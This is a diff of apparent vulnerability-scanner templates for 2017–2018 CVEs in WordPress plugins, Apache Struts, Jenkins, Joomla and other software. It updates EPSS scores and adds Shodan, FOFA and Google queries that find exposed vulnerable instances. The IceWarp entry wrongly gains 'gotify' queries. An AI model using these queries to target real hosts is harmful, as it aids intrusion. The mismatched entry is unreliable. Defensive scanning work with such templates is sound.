b/http/cves/2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: pagination framework: wordpress publicwww-query: "/wp-content/plugins/pagination/" + shodan-query: http.html:/wp-content/plugins/pagination/ + fofa-query: body=/wp-content/plugins/pagination/ tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss http: diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 5e2a3b4028..3a88acbb5a 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -26,6 +26,8 @@ info: product: pdf_\&_print framework: wordpress publicwww-query: "/wp-content/plugins/pdf-print/" + shodan-query: http.html:/wp-content/plugins/pdf-print/ + fofa-query: body=/wp-content/plugins/pdf-print/ tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 844e663cbb..34a0ccab1b 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: promobar framework: wordpress publicwww-query: /wp-content/plugins/promobar/ + shodan-query: http.html:/wp-content/plugins/promobar/ + fofa-query: body=/wp-content/plugins/promobar/ tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index b51207a43c..b251907434 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -26,6 +26,8 @@ info: product: rating framework: wordpress publicwww-query: "/wp-content/plugins/rating-bws/" + shodan-query: http.html:/wp-content/plugins/rating-bws/ + fofa-query: body=/wp-content/plugins/rating-bws/ tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index f926ec8b94..e3e4a1947e 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -26,6 +26,8 @@ info: product: realty framework: wordpress publicwww-query: /wp-content/plugins/realty/ + shodan-query: http.html:/wp-content/plugins/realty/ + fofa-query: body=/wp-content/plugins/realty/ tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index cd26894b3d..c491888c89 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index a967010a40..bf1d5a78ec 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: visitors_online framework: wordpress publicwww-query: "/wp-content/plugins/visitors-online/" + shodan-query: http.html:/wp-content/plugins/visitors-online/ + fofa-query: body=/wp-content/plugins/visitors-online/ tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 4dc23667c9..bb4ae4564f 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.59511 + epss-percentile: 0.60119 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: zendesk_help_center framework: wordpress publicwww-query: "/wp-content/plugins/zendesk-help-center/" + shodan-query: http.html:/wp-content/plugins/zendesk-help-center/ + fofa-query: body=/wp-content/plugins/zendesk-help-center/ tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 0069a24e8b..8cb0b0a3a0 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18556 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: google_analytics framework: wordpress publicwww-query: "/wp-content/plugins/bws-google-analytics/" + shodan-query: http.html:/wp-content/plugins/bws-google-analytics/ + fofa-query: body=/wp-content/plugins/bws-google-analytics/ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 90fa86fe6c..2243806246 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: google_maps framework: wordpress publicwww-query: "/wp-content/plugins/bws-google-maps/" + shodan-query: http.html:/wp-content/plugins/bws-google-maps/ + fofa-query: body=/wp-content/plugins/bws-google-maps/ tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index ac1987e5ac..c4889c31ea 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: testimonials framework: wordpress publicwww-query: "/wp-content/plugins/bws-testimonials/" + shodan-query: http.html:/wp-content/plugins/bws-testimonials/ + fofa-query: body=/wp-content/plugins/bws-testimonials/ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index cf3f3bc36f..7e99d9c7c3 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: error_log_viewer framework: wordpress publicwww-query: "/wp-content/plugins/error-log-viewer/" + shodan-query: http.html:/wp-content/plugins/error-log-viewer/ + fofa-query: body=/wp-content/plugins/error-log-viewer/ tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 4aa9bf9453..d40c5f2e22 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: sender framework: wordpress publicwww-query: "/wp-content/plugins/sender/" + shodan-query: http.html:/wp-content/plugins/sender/ + fofa-query: body=/wp-content/plugins/sender/ tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 8c99ba4b6a..d32fcceffd 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: updater framework: wordpress publicwww-query: "/wp-content/plugins/updater/" + shodan-query: http.html:/wp-content/plugins/updater/ + fofa-query: body=/wp-content/plugins/updater/ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index fdd8dd2053..4a20213479 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: user_role framework: wordpress publicwww-query: "/wp-content/plugins/user-role/" + shodan-query: http.html:/wp-content/plugins/user-role/ + fofa-query: body=/wp-content/plugins/user-role/ tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index b7393b1790..65c8cabca4 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.38554 + epss-percentile: 0.39752 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: qards framework: wordpress tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index f79e1ee9db..4c6c339c2d 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-18638 cwe-id: CWE-918 - epss-score: 0.00902 - epss-percentile: 0.80938 + epss-score: 0.00827 + epss-percentile: 0.81931 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 4b4be69409..586de89eea 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle http: diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 34e1582b67..088fe2c837 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - epss-percentile: 0.81972 + epss-percentile: 0.82307 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index a39445b71a..7b4e5e57d0 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49103 + epss-percentile: 0.49977 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 8f0b35c820..25f3f5218d 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65504 + epss-percentile: 0.68687 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kmc_information_systems product: caseaware + fofa-query: title="caseaware" tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems http: diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 4a75dec841..985a6a668c 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -21,7 +21,7 @@ info: cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 - epss-score: 0.97543 + epss-score: 0.97542 epss-percentile: 0.99995 cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: @@ -30,6 +30,8 @@ info: vendor: apache product: struts shodan-query: html:"Apache Struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,kev,msf,struts,rce http: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 31c5b32685..b61c01b8ad 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -29,6 +29,8 @@ info: vendor: intel product: active_management_technology_firmware shodan-query: title:"Active Management Technology" + fofa-query: title="active management technology" + google-query: intitle:"active management technology" tags: cve2017,cve,amt,intel,tenable,kev http: diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index b4bdcfd7eb..bc2a7ea770 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -26,8 +26,9 @@ info: vendor: phpcollab product: phpcollab shodan-query: http.title:"PhpCollab" + fofa-query: title="phpcollab" + google-query: intitle:"phpcollab" tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive - variables: string: "CVE-2017-6090" diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 9514f14b50..875939fb07 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -28,6 +28,7 @@ info: max-request: 1 vendor: microsoft product: internet_information_server + shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" tags: cve2017,cve,rce,windows,iis,kev,microsoft http: diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index ed275c5a6d..823b523c7e 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.56428 + epss-percentile: 0.56964 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 vendor: magmi_project product: magmi + shodan-query: http.component:"magento" tags: cve2017,cve,magmi,xss,magmi_project http: diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index dce109934a..23e75da196 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -26,12 +26,14 @@ info: cve-id: CVE-2017-7615 cwe-id: CWE-640 epss-score: 0.97404 - epss-percentile: 0.99917 + epss-percentile: 0.99923 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: mantisbt product: mantisbt + shodan-query: http.favicon.hash:662709064 + fofa-query: icon_hash=662709064 tags: cve,cve2017,mantisbt,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 73a298378d..1eb505345d 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -24,6 +24,8 @@ info: vendor: icewarp product: server shodan-query: title:"icewarp" + fofa-query: title="gotify" + google-query: intitle:"gotify" tags: cve,cve2017,xss,icewarp http: diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index cc1ad0e3e8..607cd654fd 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-7921 cwe-id: CWE-287 epss-score: 0.01361 - epss-percentile: 0.85934 + epss-percentile: 0.86195 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 4e91d62001..14972a640b 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -27,6 +27,7 @@ info: vendor: dahuasecurity product: dh-ipc-hdbw23a0rn-zs_firmware shodan-query: http.favicon.hash:2019488876 + fofa-query: icon_hash=2019488876 tags: cve,cve2017,dahua,camera,dahuasecurity http: diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 036670e1de..81fc123f6c 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-8917 cwe-id: CWE-89 epss-score: 0.97555 - epss-percentile: 0.99997 + epss-percentile: 0.99998 cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: joomla product: joomla\! shodan-query: http.component:"Joomla" + fofa-query: body="joomla! - open source content management" tags: cve2017,cve,joomla,sqli variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index de79ed77ef..de35bb88ae 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.00191 - epss-percentile: 0.55758 + epss-percentile: 0.56488 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index f2bc24d415..892a6db7fc 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -18,14 +18,17 @@ info: cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 - epss-score: 0.01037 - epss-percentile: 0.83585 + epss-score: 0.01187 + epss-percentile: 0.85048 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: odoo product: odoo + shodan-query: cpe:"cpe:2.3:a:odoo:odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: cve2017,cve,odoo,lfi http: diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 69bed2f75e..51f30bafe7 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -14,13 +14,14 @@ info: - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - https://nvd.nist.gov/vuln/detail/CVE-2017-9506 + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.00575 - epss-percentile: 0.75564 + epss-percentile: 0.77897 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 488403b049..32d5c459cc 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -31,6 +31,7 @@ info: product: struts shodan-query: title:"Struts2 Showcase" fofa-query: title="Struts2 Showcase" + google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,rce,struts,kev variables: num1: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 8b453e5610..79c018c149 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-9805 cwe-id: CWE-502 epss-score: 0.97541 - epss-percentile: 0.99995 + epss-percentile: 0.99994 cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts,kev http: diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 97e44144e5..36f50d8c22 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -20,13 +20,14 @@ info: cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 - epss-score: 0.97056 - epss-percentile: 0.99742 + epss-score: 0.96984 + epss-percentile: 0.99734 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dnnsoftware product: dotnetnuke + fofa-query: app="dotnetnuke" tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware http: diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index fcdf436a30..8673537ca0 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-9833 cwe-id: CWE-22 epss-score: 0.7354 - epss-percentile: 0.98027 + epss-percentile: 0.98104 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 3cd87f31de..aa8a60026f 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -14,13 +14,14 @@ info: - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345 - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 - http://www.securitytracker.com/id/1040345 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 cwe-id: CWE-306,CWE-200 epss-score: 0.09982 - epss-percentile: 0.94323 + epss-percentile: 0.94853 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index c7ad561227..9eb219e168 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00257 - epss-percentile: 0.64818 + epss-percentile: 0.65435 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 6322e6368f..ae606c2ab8 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -14,13 +14,15 @@ info: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/SexyBeast233/SecBooks classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - epss-percentile: 0.98492 + epss-percentile: 0.9873 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 5eb5e5ebfa..9467c33124 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -24,6 +24,9 @@ info: max-request: 1 vendor: cobblerd product: cobbler + shodan-query: http.title:"cobbler web interface" + fofa-query: title="cobbler web interface" + google-query: intitle:"cobbler web interface" tags: cve2018,cve,cobbler,auth-bypass,cobblerd http: diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index d240447832..6295efc437 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: gitlist product: gitlist + shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist" tags: cve,cve2018,git,gitlist,vulhub,rce http: diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 009d5c0c00..c310e25cba 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -29,6 +29,7 @@ info: vendor: sympa product: sympa shodan-query: http.html:"sympa" + fofa-query: body="sympa" tags: cve,cve2018,redirect,sympa,debian http: diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index dcc69a343c..25fb539b3d 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-1000856 cwe-id: CWE-79 - epss-score: 0.00092 - epss-percentile: 0.38207 + epss-score: 0.00069 + epss-percentile: 0.30035 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index cd9da547aa..0506efb3c4 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - epss-score: 0.9734 - epss-percentile: 0.99882 + epss-score: 0.9732 + epss-percentile: 0.99878 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 vendor: jenkins product: jenkins + shodan-query: http.favicon.hash:81586312 + fofa-query: icon_hash=81586312 tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins http: diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 